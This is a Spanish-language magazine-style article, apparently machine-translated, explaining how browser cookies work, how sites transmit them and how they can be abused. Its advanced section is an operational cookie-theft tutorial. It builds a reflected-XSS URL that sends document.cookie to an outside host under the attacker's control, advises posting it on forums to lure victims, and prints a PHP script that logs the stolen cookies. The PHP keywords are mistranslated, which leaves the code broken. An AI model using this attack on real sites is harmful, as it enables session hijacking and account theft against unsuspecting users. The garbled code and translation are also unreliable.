Cookie significa postre pequeño en inglés y siempre podemos ver esta palabra en el navegador. ¿Cómo se puede relacionar la comida con el navegador? Cuando navegas por un sitio web en el que has iniciado sesión anteriormente, es posible que veas el siguiente mensaje en la página web: Hola XX, se siente muy amigable, como comer un pequeño postre. En realidad, esto se logra accediendo a un archivo en su host, por lo que este archivo también se denomina cookie. ¿Quieres saber todo sobre las cookies? ¡Echa un vistazo a continuación!
1. Comprender las cookies Objetos aplicables: Lectores principiantes
La cookie es un pequeño archivo de texto que el sitio web almacena en su máquina cuando navega por un sitio web. Registra su ID de usuario, contraseña, páginas web navegadas, tiempo dedicado y otra información. Al volver al sitio web, el sitio web aprende su información relevante al leer la cookie y puede tomar las acciones correspondientes, como mostrar un eslogan que le da la bienvenida en la página o permitirle navegar directamente sin ingresar su ID o contraseña. Iniciar sesión y más. . Puede ver todas las cookies guardadas en su computadora seleccionando "Configuración/Ver archivos" en la pestaña "General" de "Herramientas/Opciones de Internet" en IE. Estos archivos suelen tener el formato usuario@dominio , donde usuario es su nombre de usuario local y dominio es el nombre de dominio del sitio web que está visitando. Si utiliza el navegador NetsCape, se almacena en "C:PROGRAMFILESNETSCAPEUSERS". A diferencia de IE, NETSCAPE utiliza un archivo de cookies para registrar las cookies de todos los sitios web.
Para garantizar la seguridad de Internet, debemos configurar las cookies de forma adecuada. Abra la pestaña "Privacidad" en "Herramientas/Opciones de Internet" (tenga en cuenta que esta configuración solo existe en IE6.0, otras versiones de IE pueden hacer clic en "Nivel personalizado" en la pestaña "Seguridad" del botón "Herramientas/Opciones de Internet" para realizar ajustes simples) para ajustar el nivel de seguridad de las cookies. Normalmente, puede ajustar el control deslizante a la posición "media-alta" o "alta". La mayoría de los sitios de foros requieren el uso de información de cookies. Si nunca visita estos lugares, puede ajustar el nivel de seguridad a "Bloquear todas las cookies". Si solo desea bloquear las cookies de sitios web individuales, puede hacer clic en el botón "Editar" para agregar los sitios web que desea bloquear a la lista. En la opción del botón "Avanzado", puede configurar cookies propias y cookies de terceros. Las cookies propias son cookies del sitio web que está navegando, y las cookies de terceros no son cookies que le envía el sitio web en el que se encuentra. Navegando normalmente hay que elegir "Rechazar" para las cookies de terceros, como se muestra en la Figura 1. Si necesita guardar cookies, puede utilizar la función "Importar y exportar" de IE, abrir "Archivo/Importar y exportar" y seguir las instrucciones.
La mayor parte del contenido de la cookie está cifrado, por lo que nos parece que es sólo una combinación sin sentido de letras y números. Sólo el controlador CGI del servidor conoce su verdadero significado. Podemos ver más contenido a través de algún software. La información de las cookies vista usando el software Cookie Pal se muestra en la Figura 2. Nos proporciona el contenido de Servidor, Expires, Nombre, Valor y otras opciones. Entre ellos, el Servidor es el sitio web que almacena las cookies, Expires registra el tiempo y la vida útil de la cookie, y los campos Nombre y valor son datos específicos (este periódico tiene una introducción detallada a este software en el Número 10, Página 42).
Dirección de descarga: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Proceso de entrega de cookies Objetos aplicables: Lectores intermedios Cuando escriben la URL de un sitio web en la barra de direcciones del navegador, el navegador enviará una solicitud para leer la página web al sitio web y mostrará el resultado en el monitor. En este momento, la página web busca el archivo Cookie establecido por el sitio web de Amazon en su computadora. Si lo encuentra, el navegador enviará los datos del archivo Cookie junto con la URL ingresada previamente al servidor de Amazon. Cuando el servidor recibe los datos de las cookies, recuperará su identificación, sus registros de compras, preferencias personales y otra información en su base de datos, registrará el nuevo contenido y lo agregará a la base de datos y a los archivos de cookies. Si no se detecta ninguna cookie o la información de su cookie no coincide con la información de la base de datos, significa que está navegando por el sitio web por primera vez y el programa CGI del servidor creará nueva información de identificación para usted y la guardará en la base de datos.
Las cookies se transfieren utilizando la información del encabezado HTTP en el código de la página web. Las cookies se pueden transferir con cada solicitud de página web realizada por el navegador, por ejemplo, cuando el navegador abre o actualiza la página web. El servidor agrega la cookie a la información del encabezado HTTP de la página web y transmite los datos de la página web a su navegador. El navegador elegirá si desea guardar estos datos según la configuración de cookies de su computadora. Si el navegador no permite el almacenamiento de cookies, los datos desaparecerán al cerrar el navegador. El tiempo que se almacenan las cookies en su ordenador es diferente, lo que viene determinado por la configuración del servidor. Las cookies tienen un atributo Expires (período de validez), que determina el tiempo de almacenamiento de las cookies. El servidor puede cambiar el tiempo de almacenamiento de las cookies configurando el valor del campo Expires. Si este atributo no está configurado, las cookies solo son válidas mientras navega por la web. Si cierra el navegador, estas cookies desaparecerán automáticamente. Normalmente, una cookie contiene los campos Servidor, Expires, Nombre y Valor. Solo los campos Nombre y Valor son útiles para el servidor. El contenido de Expires y otros campos son solo para indicarle al navegador cómo procesar estas Cookies.
3. Implementación de programación de cookies Objetos aplicables: lectores avanzados La mayoría de los lenguajes de programación web brindan soporte para cookies. Como JavaScript, VBScript, Delphi, ASP, SQL, PHP, C#, etc. En estos lenguajes de programación orientados a objetos, la utilización de programación de Cookie es básicamente similar. El proceso general es: primero cree un objeto Cookie (Objeto) y luego use la función de control para asignar, leer, escribir y otras operaciones a la Cookie. Entonces, ¿cómo obtener información confidencial en las cookies de otros usuarios a través del código? Sigue una breve introducción.
Este método tiene dos pasos principales: primero, ubica el sitio web que necesitas para recopilar cookies, analízalo y construye la URL; luego compila el código PHP para recopilar cookies y colócalo en un sitio web que puedas controlar, sin saberlo. El código se puede ejecutar después de que el usuario haga clic en la URL que usted construyó. Veamos el proceso de implementación específico a continuación.
1. Analice y construya la URL.
Primero abra el sitio web donde queremos recopilar cookies. Aquí asumimos que es http://www.XXX.net . Inicie sesión en el sitio web e ingrese el nombre de usuario "<A1>". sin comillas) para analizar los datos y capturar los paquetes, obtenga un código en forma de "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x. =28&ok.y=6", reemplace "<A1>" Intente nuevamente con "<script>alert(document.cookie)</script>"; si la ejecución es exitosa, comience a construir la URL: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". Entre ellos, http:///www.cbifamily.org/cbi.php es un script en un determinado host que puedes controlar. Cabe señalar que "%2B" es la codificación URL del símbolo "+", porque "+" se tratará como un espacio. La URL se puede publicar en el foro para inducir a otros a hacer clic en ella.
2. Prepare el script PHP
La función de este script es recopilar archivos de cookies. El contenido específico es el siguiente.
<?php
$info = getenv("QUERY_STRING");
si ($información) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
encabezado("Ubicación: http://www.downcodes.com ");
?>
4. Problemas de seguridad de las cookies Objetos aplicables: Todos los lectores que desean estar seguros en línea
1. Engaño de cookies
Las cookies registran información como ID de cuentas de usuario y contraseñas. Si se transmiten en línea, generalmente se utiliza el cifrado MD5. Incluso si algunas personas con motivos ocultos interceptan la información cifrada en Internet, no podrán entenderla porque lo único que ven son letras y números sin sentido. Sin embargo, el problema ahora es que las personas que interceptan cookies no necesitan conocer el significado de estas cadenas. Sólo necesitan enviar las cookies de otras personas al servidor y, si pueden pasar la verificación, pueden pretender ser la identidad de la víctima. inicie sesión en el sitio web. Este método se llama suplantación de cookies. El requisito previo para la suplantación de cookies es que exista una vulnerabilidad en el programa de verificación del servidor y el impostor quiera obtener la información de las cookies de la persona que se está suplantando. Es muy difícil para el programa de verificación de sitios web actual excluir todos los inicios de sesión ilegales. Por ejemplo, el lenguaje utilizado para escribir el programa de verificación puede tener lagunas. Además, es muy fácil obtener las cookies de otras personas. Puede lograrlo escribiendo un pequeño fragmento de código en un lenguaje que admita cookies (consulte los detalles en el método 3. Siempre que este código se coloque en la red, las cookies de todos). se puede recoger. Si un foro permite código HTML o permite el uso de etiquetas Flash, puede usar estas tecnologías para recopilar código de cookies y colocarlo en el foro, luego darle a la publicación un tema atractivo y escribir contenido interesante, y podrá recopilar rápidamente una gran cantidad. de Galletas. En el foro, las contraseñas de muchas personas fueron robadas mediante este método. En cuanto a cómo prevenirlo, actualmente no existe una cura específica. Solo podemos usar los métodos de protección habituales. No use contraseñas importantes en foros, no use la función IE para guardar contraseñas automáticamente y trate de no iniciar sesión en sitios web. donde no conoces los detalles.
2. Peligros ocultos del código Flash
Hay una función getURL() en Flash que puede usar esta función para abrir automáticamente una página web específica. Por lo tanto, puede conducirle a un sitio web que contenga código malicioso. Por ejemplo, cuando disfruta de una hermosa animación Flash en su computadora, es posible que el código en el cuadro de la animación se haya conectado silenciosamente a Internet y haya abierto una página muy pequeña que contiene un código especial. Esta página puede recopilar sus cookies y hacer otras cosas, como instalar troyanos en su máquina o incluso formatear su disco duro, etc. Los sitios web no pueden prohibir este comportamiento de Flash porque es el comportamiento interno de los archivos Flash. Lo que podemos hacer es intentar abrir el firewall si está navegando localmente. Si el firewall le solicita que no conozca los paquetes de datos enviados, es mejor prohibirlos. Si quieres disfrutarlo en Internet, lo mejor es buscar algunos sitios web grandes y conocidos.